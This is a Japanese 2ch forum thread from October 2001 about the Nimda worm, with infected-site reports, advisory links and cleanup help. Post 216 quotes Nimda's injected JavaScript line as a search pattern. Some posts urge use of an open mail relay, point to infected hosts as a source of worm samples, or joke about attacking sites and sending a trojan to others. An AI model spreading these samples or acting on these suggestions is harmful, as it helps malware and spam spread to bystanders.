そういう自覚はまったくないようです。このbbsにもそういう話は出てこないし元感染サイトの
www.zumensoft.co.jp
でも感染告知は一切なしです。

迷惑をかけたなどという意識はまったくないのでしょう。

127 :名無しさん@お腹いっぱい。:01/10/03 02:11
inoue@zumensoft.co.jpに、以下のようなメールを送ったyo!


このサイトは数日に渡ってウイルスに感染し訪問者はじめ他社サイトを攻撃していましたが、感染の事実が書かれていません。

感染サイトは感染当時の来訪者に向けて広く告知すべきではないでしょうか。

(参考)
http://www.cameraguild.co.jp/officeheliar/moo/

片手落ちの復旧ではなく、きちんと警戒を呼びかけるべきだと思います。

128 : :01/10/03 02:11
>126
そういう向きには、新たなIISの穴出てEXPLOIT出たら、真っ先に落してやるのが
良かろうと思われ。。。

129 :名無しさん@お腹いっぱい。:01/10/03 02:43
そう言えば1日にJR東海の指定席予約システムが2時間ダウンしていたんだけどニムダの再感染かもね。
社長が記者会見で「ニムダに社内のネットワークとホームページが感染したがFWで対処した」と言ってたんで
内部の再感染し易い環境はそのままだったのだろう。

130 :禿凧ゴリラ貝@ダイワ運湯浪再無視:01/10/03 03:20
RealBigDeal@postmasterglobal.com

Info@your411ToWin.com

160000001E@mail2.playsic.com

dnaxs384a@msn.com

chantaldenboer2713@excite.com

10bqgh@msn.com

exchange@mail.durdene.com

131 :x:01/10/03 03:25
x

132 :名無しさん@お腹いっぱい。:01/10/03 06:03
IPですまん。
210.92.128.194
210.249.116.115
210.159.242.140
210.130.178.147

133 :名無しさん@お腹いっぱい。:01/10/03 09:46
>>129

これも同類?

http://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all

<ソニー銀行>システムに障害 口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。

134 :名無しさん@お腹いっぱい。:01/10/03 09:49
http://www.with9.com/

奥のほうの1ページ分の鯖だけじゃなかったのか・・。

重要なお知らせ


9/18当サーバーは『Nimdaウイルス』感染し、皆様には大変な迷惑と、ご不便をおかけすることなり大変申し訳ございませんでした。

同ウイルスにより、当サーバーは深刻な被害をうけ、現在のサーバーは仮運用となっているため、動作スピードが十分でなない可能性がございます。 早急に完全な状態に復旧する所存ですのでご理解いただけますようお願いいたします。


135 :名無しさん@お腹いっぱい。:01/10/03 10:06
厨房な質問ですいません。私も最近ニムダに感染したのですが、
とりあえず、ニムダ駆除ファイルをDLして駆除したのですが、
変なファイルは全部消し去ったみたいですが、コレって一応
完全駆除してるのでしょうか?

それとも表向きだけの応急処置?

136 :名無しさん@お腹いっぱい。:01/10/03 10:24
ttp://eatkyo05188.adsl.ppp.infoweb.ne.jp/
こいつしつこい。
警告しようにも認証画面から先に進めないし・・・

137 :名無しさん@お腹いっぱい。:01/10/03 10:24
Asia Pacific Network Information Center
って糞?

138 :名無しさん@お腹いっぱい。:01/10/03 10:25
>>135
一応は変なファイルは駆除できてるかもしれないがトロイの木馬
まで除去したかどうかはわからない。
っていうかこれガイシュツじゃないの?

139 :名無しさん@お腹いっぱい。:01/10/03 10:26
>>135
駆除しても,穴塞いどかないと何度でも感染するぞ

140 :名無しさん@お腹いっぱい。:01/10/03 10:28
>>136
半端にきちんとしていて、はんぱにズサンなサイトだな・・。

141 :名無しさん@お腹いっぱい。:01/10/03 10:28
>>135
http://www.symantec.com/region/jp/sarcj/nimda.html
よく嫁。

142 :名無しさん@お腹いっぱい。:01/10/03 10:38
>>141
こういっちゃなんだがいまいちわかりにくいな、このページは(^^;

143 :名無しさん@お腹いっぱい。:01/10/03 10:49
>>142
ゼイタクはウイルスと同等 (▼、▼メ)メラメラ

144 :142:01/10/03 11:20
>>143
すまんこってす。

私は135ではないのだが、これで135みたいな質問してくる人に
138や139みたいな内容を141(のURL)から汲み取れるのかいなぁ、
と思った次第。

141さんの引用が不適切というのではなく、www.symantec.comの
書き方が(135のようなヒトには)わかりにくいなぁ、と。

>ゼイタクはウイルスと同等
御意。謹んでお言葉お受けしますm(_ _)m

145 :名無しさん@お腹いっぱい。:01/10/03 11:41
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kp

北朝鮮(.kp)からこねーなーと思っていたら、こうなってたのか・・。


韓国の場合
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr

146 :名無しさん@お腹いっぱい。:01/10/03 14:02
>>144
141、143ですが、悪気はないのであしからず。2chだしぃ〜(~_~;)
このしまんてっくサイトを1回読んで理解しようとしちゃい神崎(#/__)/。
Nimdaは活動自体が比較的複雑・多義にわたると思われ、何回も読んで理解すべし。
気に入らん場合はこっちはどうだ?

Nimda情報リンク
http://www.trendmicro.co.jp/nimda/
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://www.forest.impress.co.jp/article/2001/10/01/accessranking.html
http://www.so-net.ne.jp/manual/topics/virus/index.html

まだ足らんか (▼、▼メ)メラメラ

147 :名無しさん@お腹いっぱい。:01/10/03 14:11
ってか、146だがこのスレ最初から読めばあぼ〜ん。。(使い方ちがう?)
agesage厨房ワラタ意味不明スマソ

148 : :01/10/03 14:13
数段階の仲介を経てからでしかその知識を得られないなんて。
理想ならその業界の技術書を熟読するのが一番なの。
サバ構築だって然り。ネットとは何か?と言うこと。
書店にあるものを読んでるうちは中級どまり。
高校の微積分を学ぶときは決してニュートンやライプニッツの原書を読まないのは単に難易度の問題。
機会があれば読むべき。

149 :禿凧ゴリラ貝@三原名誉会長ダイワ運湯浪再無視:01/10/03 15:40
From : 752luq5f5n@msn.com
Reply-To :
laurenevallejo1691@excite.com

To : j310knlqx5d@msn.com
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From 752luq5f5n@msn.com Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。


RealBigDeal@postmasterglobal.com

752luq5f5n@msn.com

laurenevallejo1691@excite.com

j310knlqx5d@msn.com

spamspamspam@viking.combination.com

150 :名無しさん@お腹いっぱい。:01/10/03 16:19
>>134
ここもまだServer: Microsoft-IIS/4.0だった。
Coderedが無くなるとフォマト&インストロールでバックドアが安易に開かないから
ニムダにも感染し難くなるって事でセキュリティホールが有っても安心しちゃうのかな。

ニムダ+CodeRedで暫くするとOSや共有ドライブも含めたデーターの破壊ルーチンが入っているような
ワームが出る可能性は十分にあると思うんだが・・・

151 :名無しさん@お腹いっぱい。:01/10/03 17:03
>>150

あるでしょう、もう一発。XPが出て、やれ悪ティべーしょんがどうの、使用期限がどうの、初期バグがどうの、なんてなったら後生大事に旧バージョンを入れる(オマケにパッチは意識の外)所は非常に増えそうな。

予感だけど。

152 :名無しさん@お腹いっぱい。:01/10/03 17:16
http://www.htsc.ap.titech.ac.jp
http://www.kano.arch.waseda.ac.jp/
http://www1.fl.kansai-u.ac.jp/

大学の研究室の鯖って、ニムダ後閉鎖されたまま再建される
雰囲気がないんだけど、やっぱこういう騒ぎ起こすと普通は
鯖建立権剥奪?

153 :名無しさん@お腹いっぱい。:01/10/03 17:19
>>151
そう言えば大手家電H社さんはつい最近までWindows3.1のインターフェース(W3.1やNT3.5とか)で統一してたんだってね(w

154 :名無しさん@お腹いっぱい。:01/10/03 18:18
>151
深く激しく同意

155 :第三者中継可能!使ってやってくれ!:01/10/03 18:21
viking.combination.com
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

laurenevallejo1691@excite.com

RealBigDeal@postmasterglobal.com

752luq5f5n@msn.com

laurenevallejo1691@excite.com

j310knlqx5d@msn.com

spamspamspam@viking.combination.com

156 :名無しさん@お腹いっぱい。:01/10/03 18:27
まだまだ感染中。

http://www.clubtgp.com/freehosting/teeny/kat/index.htm

>>75ご登場の消防にみせてやりたい(w

157 :名無しさん@お腹いっぱい。:01/10/03 19:05
思うんだが、ニムダに何度も感染しているようなヤツって、おそらくこの10月16日には絶叫する羽目になると思うんだが・・。

みんな忘れているのかもしれないが。

158 :名無しさん@お腹いっぱい。:01/10/03 19:15
>>157
Sircamかな?
10/16にCドライブの全てのファイルとディレクトリを消去する。

159 :名無しさん@お腹いっぱい。:01/10/03 19:20
>>157の言っているのがSircamだとしたら、
日本語環境の日付形式(Y/M/D)では発症しないんじゃ
なかったっけ?

にしてもまだSircamが残っているのが凄いよな…

160 :名無しさん@お腹いっぱい。:01/10/03 19:24
復活。

http://www.yy.t.u-tokyo.ac.jp/fujiwara/news.html

なんだかカッコイイ(w

161 :名無しさん@お腹いっぱい。:01/10/03 19:37
>>160
ここもパスワード付きバックドアという妙な仕様だな(w

162 :名無しさん@お腹いっぱい。:01/10/03 19:46
The attachment, which arrives within the mail is almost the
same as TrendMicro publish to fix the damages of the Nimda
worm, the only difference between them is the file extension
(FIX_NIMDA.com (original) and FIX_NIMDA.exe (trojan horse)).

↓トレンドマイクロもココに赤文字で書いてる(w
http://inet.trendmicro.co.jp/virusinfo/vbc_vinfo.asp
Nimdaの修復ツール騙る嘘つきトロイだって。。。
色々出てくるね(w
まだ、データベースに詳細出てないけど。

163 :名無しさん@お腹いっぱい。:01/10/03 19:48
>>161
流行ってるのかな?(w
http://210.105.22.10/
http://114.c210-85-64.ethome.net.tw/
http://211.96.111.55/

164 :名無しさん@お腹いっぱい。:01/10/03 19:56
>>162
これ入手したら、気にくわないやつに送りつけるだけで(w

165 ::01/10/03 19:59
>>http://211.96.111.55/
うちでは最後のCodeRedがコイツだった。

166 ::01/10/03 20:01
www.telook.co.jp
ってなんだべ。
初期のころから10/2まで間欠的にNimdaとばしてくれてる

167 :名無しさん@お腹いっぱい。:01/10/03 20:09
>>165
>>>http://211.96.111.55/
> うちでは最後のCodeRedがコイツだった。

パスワードのバックドア、ニムダにさっどまいんど&赤コード。フルコースか?(w

168 :名無しさん@お腹いっぱい。:01/10/03 20:15
>>162
これについてか、昨夜VBのアップデートが出てるね。

のうとん先生はまだの様子。

169 :名無しさん@お腹いっぱい。:01/10/03 21:19
うっ。

http://www.miruku.co.jp/index.html

---
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>

<!-- sorosoro naosouyo... meiwakudayo... -->

170 :名無しさん@お腹いっぱい。:01/10/03 21:22
(藁

171 :名無しさん@お腹いっぱい。:01/10/03 21:27
もしかしてアクセスカウントアップの早道ってニムダ感染だったりして・・。

172 :名無しさん@お腹いっぱい。:01/10/03 21:29
>>171
どころか、見に来てほしいコンテンツがポートスキャンで召還しにくるようになったりして・・。

173 :名無しさん@お腹いっぱい。:01/10/03 21:31
>>172
見に来ないとクラックするぞゴルァとかポートたたくんだったりして・・。

174 :名無しさん@お腹いっぱい。:01/10/03 21:31
>>173
これが本当のプッシュ(圧力)コンテンツだったりして・・。

175 :名無しさん@お腹いっぱい。:01/10/03 22:07
シヴイ・・。

http://www.lac.co.jp/security/news/attack/index.html

176 :名無しさん@お腹いっぱい。:01/10/03 22:34
う〜む・・。

FBIがセキュリティー問題のトップ20を公表
http://japan.cnet.com/News/2001/Item/011003-8.html?mn

177 :名無しさん@お腹いっぱい。:01/10/03 23:03
>>169

あーあー、エスカレートしてるし(^^;

178 :名無しさん@お腹いっぱい。:01/10/03 23:38
>>169
(藁

179 :名無しさん@お腹いっぱい:01/10/03 23:54
質問!
NATeでルータ経由でインターネットに接続した時・・
PCでパッチ未適用IIS5がうごいていたらnimdaに感染しますか?

180 :名無しさん@お腹いっぱい。:01/10/04 00:07
>>179
Nimudaが攻撃するセキュリティホールの一つを塞いだにすぎないのであれば
感染する可能性がまだ残っている。

181 :180:01/10/04 00:12
すいません・・
書き方が足りませんでした

>NATeでルータ経由でインターネットに接続した時・・
>PCでパッチ未適用IIS5がうごいていたら(IEは未使用)
インターネットから直接nimdaに感染しますか?

182 :179:01/10/04 00:17
↑名前欄の番号まちがえましたm(__)m

183 :名無しさん@お腹いっぱい。:01/10/04 00:19
ポート80をIISにまわすようになってたら感染するのではないか

184 :名無しさん@お腹いっぱい。:01/10/04 00:24
Coderedに過去に感染していた場合レジストリが書き換えられてバックドアが開いているのでそのうち感染する。
Coderedで書き換えられたレジストリを修復してバックドアを塞いでいる又はCoderedに運良く感染していなかった場合は
Nmudaのバックドアを利用したアタックでは感染しない。

185 :180,184:01/10/04 00:28
Nimudaではない。Nimdaだった。。。。

186 :179:01/10/04 00:36
>>180 >>183 >>185
ありがとうございました

187 :すぱむスパムSPAM:01/10/04 00:57
From : 752luq5f5n@msn.com
Reply-To : laurenevallejo1691@excite.com
To : j310knlqx5d@msn.com
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From 752luq5f5n@msn.com Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

188 :名無しさん@お腹いっぱい。:01/10/04 01:56
ttp://www.clubtgp.com/freehosting/nature/gallery.htm

ここって何に感染してるのですか?
ノートン先生で修復できなかったんですけど。

189 :名無しさん@お腹いっぱい。:01/10/04 02:51
>>188
ソースが見つからないなぁ…
何なんだろう?
しかしこのページって…

190 :名無しさん@お腹いっぱい。:01/10/04 03:49
>>188
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html

191 :名無しさん@お腹いっぱい。:01/10/04 05:44
>>190
ありがとうございます

192 :名無しさん@お腹いっぱい:01/10/04 10:51
教えてください・・
IIS4/5でセキュリティパッチを入れておらず、他の感染サーバから感染するとき
コードレッド2によるバックドアがあるときとないときで
なにかかわるのでしょうか?

193 :名無しさん@お腹いっぱい。:01/10/04 11:25
>>192
バックドアがあるとき

よりスムーズに感染する

ないとき

一家が暗くなる(大阪限定

194 :192:01/10/04 11:27
>>193
>一家が暗くなる(大阪限定

こちらは、東京なので平気ということなのでしょうか?

195 :名無しさん@お腹いっぱい。:01/10/04 11:34
> >>193
> >一家が暗くなる(大阪限定
>
> こちらは、東京なので平気ということなのでしょうか?
ワロタ。

東京の人も、新大阪駅で在来線の改札に回ってみるといいよ。

196 ::01/10/04 11:39
会社でsunosのsolarisというOSを使ってるのですが
ここもNimdaにやられてしまいました。
そのPCにはWindowsも入っていますが、そちらは駆除済み
なのですが、solarisという方にはまだたくさんいるんです。
駆除できる方法、solaris系の情報、知っている方いたら
なにか教えて下さい。

197 :名無しさん@お腹いっぱい。:01/10/04 11:44
>>196
solarisで感染(っつーかコピペっつーか)したのは、Windowsで共有しているドライブだろう。
Windowsからそのドライブもウイルススキャンしてはどうか。

solarisでNimdaが動作した実績はないだろう(あたりまえだが)。あったら知らせてくれ。
ただしsolaris上で感染したファイルをWeb公開すれば外部からは感染したのと同じように見える。

198 :名無しさん@お腹いっぱい。:01/10/04 11:50
>>197
ちなみにMacで同じようになったときに、その共有ドライブをMacのウイルススキャンソフト(最新パラメータ)でスキャンしてもしてもし検知しない。
が、そのドライブの感染ファイルをWindowsで叩くとしっかり感染する。
(このへんの事情は空栗鼠でも同じだろう)

ニムダはWindowsのウイルススキャンソフトでスキャンしよう。

199 :名無しさん@お腹いっぱい。:01/10/04 11:57
>>195
>> >>193
> > >一家が暗くなる(大阪限定
> >
> > こちらは、東京なので平気ということなのでしょうか?
> ワロタ。
>
> 東京の人も、新大阪駅で在来線の改札に回ってみるといいよ。

より遠方のひとは、心斎橋本店まで足をのばし、蒸かす前のものを梱包してもらうとよいだろう。
個人的にはいしいひさいちの版が好きだ。

200 :sagesage:01/10/04 11:57
WINMXでは感染しないの?
友人が語るに自分の感染源はMXだといって
はばからないんですが。。。

201 :名無しさん@お腹いっぱい。:01/10/04 12:17
>>200
なにを持ってWinMXで感染した、というのかは疑問が残るが、
いままで報告されたニムダの挙動を聞く限り、WinMxでMP3を交換していた
だけで、WinMXを使用していただけで感染したとは考えにくい。

しかしそいつが怪しげなワレ物や、炉裏ムービーetcにまで手を出していたならその限りではない(w

202 :名無しさん@お腹いっぱい。:01/10/04 12:23
昨日感染した。鬱だ。

203 :192:01/10/04 12:27
で・・
バックドアがないと、どうなるのでしょうか?

204 :名無しさん@お腹いっぱい。:01/10/04 12:27
>>202
もう少し流行に敏感になりましょう。

205 :202:01/10/04 12:32
リカバリーできない。
winspool.drvが無いと表示される。

206 ::01/10/04 12:35
197 198
ありがとうございます。
自分のPCじゃないんで、ソラリス自体がよくわかってないのですが
Windowsのウイルススキャンソフトでやってみます。

207 :名無しさん@お腹いっぱい。:01/10/04 12:36
>>205
ちょっとまった。

駆除せずいきなりリカバリーしようとしてるのかい?

208 :202:01/10/04 12:41
>>207
学校で先ほどを駆除ソフトをDLしたばかりです。

209 :名無しさん@お腹いっぱい。:01/10/04 12:51
よくわからん・・。

210 :名無しさん@お腹いっぱい。:01/10/04 12:57
お昼にノートン先生の更新があったぞ。

211 ::01/10/04 13:22
196,206です。
Windowsの方ではチェックしました。
クラリスの中では大丈夫との事でしたが、
実はCADデータをwinNTの方に変換したりする時、フォルダごと
変換にかけるとその時にNimdaもくっついてきて、winがまた感染、、なんて
ことになるそうです。
面倒でも、ファイルを1つづつ変換すれば良いのですが、量があるので
そういう訳にもいきません。
いちおうウィルスソフトを常駐させておこうという話になったのですが、
ちょっと不安です。
ソラリスに電話しても駆除ツールとかは無いそうです。
やっぱりウィルスソフトを信用してやるしかないでしょうか?

長文ですみません。

212 ::01/10/04 13:22
なぜかwinから駆除しても、ソラリスには残ってます。

213 : :01/10/04 13:34
なんつうか、実害感じるまで感染し放題だったのか?

214 :名無しさん@お腹いっぱい。:01/10/04 13:35
>>212
ソラリス側から削除すればいいのでは?

215 :名無しさん@お腹いっぱい。:01/10/04 13:42
>>213
そういうものなんだろう。
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

216 :名無しさん@お腹いっぱい。:01/10/04 13:46
>>214
んだ。

.eml
readme.exe

これを検索して全部削除することはできないか?

あとは
<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
をぐれっぷだ。

217 :名無しさん@お腹いっぱい。:01/10/04 13:47
>>214
そらりすなんか使うから、ダメなんだ。フォーマット&W2kインストール(w

218 ::01/10/04 13:56
ソラリスって検索しても、その検索結果からは
削除できないそうなんです。
ソラリスから*.emlを消すには、今のところ
フォルダ一個一個を開けて探して削除していく事しか
なさそげです。
それも気が遠くなりそうな数です。
うぅ、マイナーなOSでも相談にのっていただいて
むちゃくちゃ嬉しいです。

219 :名無しさん@お腹いっぱい。:01/10/04 14:05
>>218
そこをWindowsでマウントしてWindows側から検索するとどうだ?

220 :名無しさん@お腹いっぱい。:01/10/04 14:09
>>219
んー、ちと事情が違うかもしれないが、おれの場合SAMBA共有フォルダ
にNimdaがいると共有フォルダ開いた時点でバスターが検出して
なにも出来ないんだけどね。
だが、少なくともそこにウィルスがいること自体はわかると思うんだが。

>>218
ソラリスって、locateコマンドってないの?

221 :名無しさん@お腹いっぱい。:01/10/04 14:38
考えてみりゃ、そらりすってWindowsのファイルサーバやってるケースは多いよな。

もしかすると大半がそういう用途かもしれない。

222 :名無しさん@お腹いっぱい。:01/10/04 15:10
875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

223 :名無しさん@お腹いっぱい。:01/10/04 15:44
http://www.zdnet.co.jp/news/0110/04/e_mssecurity.html
Microsoftは,同社製品のセキュリティを懸念する声に対応す
るため,セキュリティプログラムを立ち上げた。同社はこのプログラ
ムで,パッチをまとめるツールの提供や,セキュリティアップデート
の自動化といったセキュリティ対策を顧客に提供する。

今更偉そうに言える事か?

224 :名無しさん@お腹いっぱい。:01/10/04 16:32
>>220
find じゃだめかな?

225 :すぱむスパムSPAM:01/10/04 16:36
From : 752luq5f5n@msn.com
Reply-To : laurenevallejo1691@excite.com
To : j310knlqx5d@msn.com
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From 752luq5f5n@msn.com Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

226 :名無しさん@お腹いっぱい。:01/10/04 16:41
駆除ソフトの
FIX_NIMDA v1.23ってこれ以上でてますか?

227 :1:01/10/04 16:43
http://www5.justnet.ne.jp/%7Ettp/

228 :名無しさん@お腹いっぱい。:01/10/04 17:25
Windows.NET Server英語版中間ビルド(Build 3541)リリース(ダウンロード可能)のお知らせが来た。

大丈夫なんかいな、いや、マジで。

229 :名無しさん@お腹いっぱい。:01/10/04 17:39
>>226
かねてから思っていたんだが、よくこのテの単発駆除ソフトなんか使うよなぁ。
安易に薦めるのも無責任だ。

動作保証がない上に、何をどう駆除するのか明確になっていなくて、駆除に失敗してファイルを破壊しても泣き寝入りだ。
アップデートが出ても過去の駆除ソフトが弄ったファイルは修復しないどころか、誤診しかねない。
当然ながら他のウイルスが紛れ込んでいても見て見ぬふり。
しかもバックドアは駆除しない。

しかも中にはスキャンするだけのものを実行して、英語メッセージを読み違えて発見を駆除と思い違いしているのまでいる。

>>226は単発駆除ソフトの収集マニアであることを祈る。

230 :>223:01/10/04 20:58
>Microsoftは,同社製品のセキュリティを懸念する声に対応す
>るため,セキュリティプログラムを立ち上げた。同社はこのプログラ
>ムで,パッチをまとめるツールの提供や,セキュリティアップデート
>の自動化といったセキュリティ対策を顧客に提供する。

アップデートの自動化こそヤバイってきづいてないのかな?

231 :名無しさん@お腹いっぱい。:01/10/04 23:52
でも、MSの製品がセキュアになってしまったら、Linux厨が困るよね。
実は、今までウマー具合に棲み分け出来てたんだと思ったり。

232 :名無しさん@お腹いっぱい。:01/10/04 23:56
LinuxはLinuxで、最近はやりの一発インストールLinuxで設定はみんなデフォルトのまんま、なんてのをよく見るしなぁ・・。

233 :名無しさん@お腹いっぱい。:01/10/05 00:50
win厨の自作自演は醜いと思ったり。

234 :名無しさん@お腹いっぱい。:01/10/05 08:43
>232
でもそういうマシンは公開したらすぐ手動巡回の方々にやられますがな。
世の中にはマメな人が多いよね、ホント(w

235 ::01/10/05 09:39
218です。
ソラリスの中にある*.emlが千数百個あるのがわかりました。
で、消すのはあきらめました。
とりあえず、変換時にwinNTに感染しないようにノートンを
常に働かせておくことになりました。
小さい会社なので、セキュリティ、ウイルスソフトなんてのは
入れて無かったんです。危機感が無かったので、、。

レスくれた方々、ありがとうございました。

236 :名無しさん@お腹いっぱい。:01/10/05 09:43
>>235
う。
これを読んで一層の危機感を募らせてしまった私は一体どうしたらよいだろーか。

237 :名無しさん@お腹いっぱい。:01/10/05 10:06
>>223
http://www.microsoft.com/technet/mpsa/start.asp
[Microsoft Personal Security Advisor]
とりあえず試験サイトか?[C:D:E:F:G:をNTFSにしなさい、って余計なお世話だ。]

238 :名無しさん@お腹いっぱい。:01/10/05 10:31
>>237
「ScanNow」中。
MSのサイトにHDDの中をまさぐられるのは気色悪いですなぁ・・。

239 :名無しさん@お腹いっぱい。:01/10/05 10:32
>>237
ダウンロードを要求されたので拒否しちまった(w

240 :名無しさん@お腹いっぱい。:01/10/05 10:45
>>234
格言
「最低でもTCP-Wrapperの設定してからケーブルつなげ」

241 ::01/10/05 10:59
再びすみません。
今、ソラリスの中を見てみたところ
顔文字のフォルダが勝手に作られていました。(^.^)←こんなフォルダ名です。
しかもよくよく探してみるとかなり大量に。。
あと、中には「*.cache」と「*.state」というファイルがどこのフォルダにも
コピーされていました。
たぶんcache、stateが拡張子だと思うんですが、拡張子辞典で調べても
該当する物はありませんでした。
それでとりあえず消す事になったのですが、これは
ソラリスが感染した、って事になるんでしょうか?

242 :名無しさん@お腹いっぱい。:01/10/05 11:06
>>236
お見事。

萎え。

243 :名無しさん@お腹いっぱい。:01/10/05 11:09
「*.cache」と「*.state」はどうやら必ず居るものらしいです。
ただ、顔文字フォルダだけが作られたようでした。

本当、お騒がせ致しました。。

244 :名無しさん@お腹いっぱい。:01/10/05 11:26
Solaris無料化の弊害を見た気がする。

245 :名無しさん@お腹いっぱい。:01/10/05 12:10
>>244
ちょっと同感。

でも、Windozeて決してフリーじゃないのにないのに。

246 :名無しさん@お腹いっぱい。:01/10/05 12:28
ここを読んでいたら、Solarisって、わかりにくくてマイナーで参考書の少ない、むずかしくもめんどくさいOSに思えてきてしまった・・。

247 :名無しさん@お腹いっぱい。:01/10/05 13:17
>>246
それ全部正解。今ごろ気づいたのか?

248 :名無しさん@お腹いっぱい。:01/10/05 13:41
>>247
なあんだそうだったのか、ほっとしました(^-^)

249 :名無しさん@お腹いっぱい。:01/10/05 13:44
検証用にNimdaほしいんだけどどっかないかな?

250 :名無しさん@お腹いっぱい。:01/10/05 13:50
>>249
このへんかな。

http://210.102.151.10/
http://210.103.173.1/

251 :名無しさん@お腹いっぱい。:01/10/05 13:53
>>249

web鯖立ててしばらく置いといたらなんぼでも・・・・・(以下略)

252 :名無しさん@お腹いっぱい。:01/10/05 13:57
>>251
http://www2.o-hara.ac.jp/

そうなったらしい・・。

253 :名無しさん@お腹いっぱい。:01/10/05 14:00
きちんとしているのか、いないのか・・。

http://www.kokusai2.u-keiai-sakura.ac.jp/NimdaFAQ.htm

254 :名無しさん@お腹いっぱい。:01/10/05 14:04
うーん、IE6にして変な添付ファイルも開いていないのに
何度も何度も感染する。
何故だろう。こんな漏れみたいな人って多くないのかな?

255 :名無しさん@お腹いっぱい。:01/10/05 14:05
>>250
ゲットできました!サンクス!

256 :名無しさん@お腹いっぱい。:01/10/05 14:13
>>254
だからIE6は自動感染することがあるとMSのサイトに書いてあるだろう。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
InternetExplorer
以下のバージョンをインストールしているシステムにおいて、Internet Explorer の Web ブラウザコントロールを利用する全製品


MicrosoftR Internet Explorer 6 (以下略)

---

だれだ、IE6は感染しないなどとデマ流したヤツは。

257 :名無しさん@お腹いっぱい。:01/10/05 14:20
>>256
デマは
---
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>>560
マイクロソフトのサイトにいきInternet Explorer を6.0にアップしたほうが良い
---
コイツが流した。

258 :名無しさん@お腹いっぱい。:01/10/05 14:37
>>162
修復ツールカタリウイルス、名前が付いたね。

http://www.trendmicro.co.jp/virusinfo/isp/virusency/default3.asp?VName=TROJ_JESTRO.A

259 :名無しさん@お腹いっぱい。:01/10/05 14:44
Windows updateのDLが遅い…
みんないっせいにアップデートしてるのかな

こっちはnimdaに関係なくただOS入れてるだけなのに…

260 :254:01/10/05 14:51
>>256
うーん、でもこれって最小構成だったらやばいってことでしょ。
最小構成にした記憶なんてないんだが…

はぁ、鬱だ。

261 :名無しさん@お腹いっぱい。:01/10/05 15:03
>>260
ハァ?

262 :名無しさん@お腹いっぱい。:01/10/05 15:08
>>260「自分で」最小構成「にしたとき」なんてMSのサイトに書いてないぞ。

263 :名無しさん@お腹いっぱい。:01/10/05 15:12
>>260
ISS放置してないだろうな?
